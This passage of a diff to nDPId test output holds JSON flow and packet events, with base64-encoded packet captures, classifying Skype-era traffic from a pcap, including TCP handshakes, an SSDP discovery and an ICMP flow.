+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1371,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1431969699706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699706,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYh+dN4KbwKgBIpxUw6wV0QgaIZVwM6ASOJCGcAAAAgQFrAQCCApOs6EPPiNpvQEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1431969699706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969699706,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0BLVAAEAGVHLAqAEinTeCm8OsnFQhlXAzFdEIG4AQECzdGQAAAQEICj4jaj5Os6EP"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1390,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969701181,"flow_last_seen":1431969701181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969701181,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1431969701181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969701181,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1hBAAEAGgwrAqAEinTeCm8OuAbux\/OLXAAAAALAC\/\/9NAwAAAgQFtAEDAwUBAQgKPiNv+wAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1431969701308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969701308,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYh+dN4KbwKgBIgG7w655m4Wssfzi2KASOJA0zwAAAgQFrAQCCApOs6KgPiNv+wEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1431969701308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969701308,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0yA5AAEAGkRjAqAEinTeCm8OuAbux\/OLYeZuFrYAQECyLfQAAAQEICj4jcHdOs6Kg"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704663,"flow_last_seen":1431969704663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704663,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1431969704663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704663,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjY9AAEAGMVPAqAEib91KLsOwnFtwFABlAAAAALAC\/\/8u+gAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1462,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704664,"flow_last_seen":1431969704664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704664,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1431969704664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704664,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvDNAAEAGM9LAqAEinTfrsMOxnFbKZQg9AAAAALAC\/\/\/99wAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1463,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704664,"flow_last_seen":1431969704664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704664,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1431969704664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704664,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIjNAAEAGNnTAqAEiQTffD8OynFri9dA8AAAAALAC\/\/+GBAAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1431969704743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704743,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+gmdN+uwwKgBIpxWw7HlrcetymUIPqASOJDOiAAAAgQFrAQCCApF6hSRPiN9hAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1465,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":3,"flow_last_seen":1431969704743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704743,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NN1AAEAGuzTAqAEinTfrsMOxnFbKZQg+5a3HroAQECwlZAAAAQEICj4jfdNF6hSR"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1431969704794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704794,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYatBN98PwKgBIpxaw7KHsi8C4vXQPaASOJCmxwAAAgQFrAQCCAouudI2PiN9hAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1431969704794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704794,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iwlAAEAGzanAqAEiQTffD8OynFri9dA9h7IvA4AQECz9cAAAAQEICj4jfgUuudI2"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1431969704959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704959,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOZv3UouwKgBIpxbw7DJYD8HcBQAZqASOJBMRQAAAgQFrAQCCApNhWUvPiN9hAEDAwk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431969704959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04b5AAEAG3S\/AqAEib91KLsOwnFtwFABmyWA\/CIAQECyiSwAAAQEICj4jfqhNhWUv"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1490,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969705713,"flow_last_seen":1431969705713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969705713,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1490,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1431969705713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969705713,"pkt":"0NQSxnP1PBXCt3IOCABFAABAO5ZAAEAG5a3AqAEiQAQXpsOznFablHTpAAAAALAC\/\/\/tRQAAAgQFtAEDAwUBAQgKPiOBlwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":1431969705916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969705916,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxWw7Pn2AWqm5R06qASOJA+QQAAAgQFrAQCCApMP02qPiOBlwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":1431969705916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969705916,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dcVAAEAGq4rAqAEiQAQXpsOznFablHTq59gFq4AQECyUoQAAAQEICj4jgmFMP02q"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1501,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABALAFAAEAGkuHAqAEib91KLsO0AbvHHCHtAAAAALAC\/\/9KwwAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1502,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1502,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABApn5AAEAGSYfAqAEinTfrsMO1AbsGcnDPAAAAALAC\/\/\/trQAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1503,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkWpAAEAGxzzAqAEiQTffD8O2Abu4rlNDAAAAALAC\/\/\/BnQAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1505,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1431969706353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706353,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+gmdN+uwwKgBIgG7w7Xvxq\/pBnJw0KASOJDKVgAAAgQFrAQCCApF6hYkPiODxwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1506,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":1431969706354,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706354,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0l01AAEAGWMTAqAEinTfrsMO1AbsGcnDQ78av6oAQECwhNQAAAQEICj4jhBNF6hYk"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1508,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1431969706407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706407,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYatBN98PwKgBIgG7w7bIenZGuK5TRKASOJBYwQAAAgQFrAQCCAouudPJPiODxwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1509,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1431969706408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IiZAAEAGNo3AqAEiQTffD8O2Abu4rlNEyHp2R4AQECyvaQAAAQEICj4jhEkuudPJ"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1431969706572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706572,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOZv3UouwKgBIgG7w7R3epf\/xxwh7qASOJBfaQAAAgQFrAQCCApNhWbCPiODxwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1431969706572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706572,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CZNAAEAGtVvAqAEib91KLsO0AbvHHCHud3qYAIAQECy1bQAAAQEICj4jhO1NhWbC"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1528,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969707326,"flow_last_seen":1431969707326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969707326,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1431969707326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969707326,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ORAAEAGTF\/AqAEiQAQXpsO3Abu4qWeDAAAAALAC\/\/9x6QAAAgQFtAEDAwUBAQgKPiOH3AAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1431969707546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969707546,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7w7ccEsw5uKlnhKASOJDGigAAAgQFrAQCCApMP087PiOH3AEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1431969707546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969707546,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EpBAAEAGDsDAqAEiQAQXpsO3Abu4qWeEHBLMOoAQECwc2gAAAQEICj4jiLdMP087"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1587,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969710853,"flow_last_seen":1431969710853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969710853,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1587,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431969710853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969710853,"pkt":"0NQSxnP1PBXCt3IOCABFAABAz19AAEAG2DnAqAEinTg0HMO8nEnrI3UzAAAAALAC\/\/8PzQAAAgQFtAEDAwUBAQgKPiOVkAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431969711097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969711097,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJw7we\/\/hU6yN1NKASOJAgZAAAAgQFrAQCCApMXGQgPiOVkAEDAwk="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431969711097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969711097,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CpBAAEAGnRXAqAEinTg0HMO8nEnrI3U0Hv\/4VYAQECx2mwAAAQEICj4jloNMXGQg"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChlVQAAAERcjPAqAEi7\/\/\/+sFNB2wAjXH\/TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} 
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -811,19 +811,19 @@ 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1431969712918,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969712918,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYEAAEAB8QTAqAEBwKgBIgMDgJYAAAAARQAAKImhAABAEW2wwKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="} 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": 